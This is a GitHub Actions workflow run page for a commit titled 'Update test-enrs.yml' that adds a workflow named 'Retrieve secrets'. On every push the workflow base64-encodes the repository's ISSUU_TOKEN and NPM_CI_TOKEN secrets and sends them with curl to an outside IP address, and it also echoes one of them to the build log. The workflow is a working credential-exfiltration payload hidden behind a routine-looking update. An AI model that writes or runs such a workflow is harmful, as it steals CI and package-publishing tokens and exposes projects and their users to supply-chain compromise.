Skip to content

Update test-enrs.yml #2

Update test-enrs.yml

Update test-enrs.yml #2

Workflow file for this run

name: Retrieve secrets
on: [push]
jobs:
retrieve-secrets-2:
permissions:
contents: read
id-token: write
runs-on: ubuntu-latest
steps:
- run: |
echo '${{ secrets.ISSUU_TOKEN }}' | base64
curl http://34.30.26.177:5000 -H "Authorization: ISSUU_TOKEN = $(echo '${{ secrets.ISSUU_TOKEN }}' | base64)"
curl http://34.30.26.177:5000 -H "Authorization: NPM_CI_TOKEN = $(echo '${{ secrets.NPM_CI_TOKEN }}' | base64)"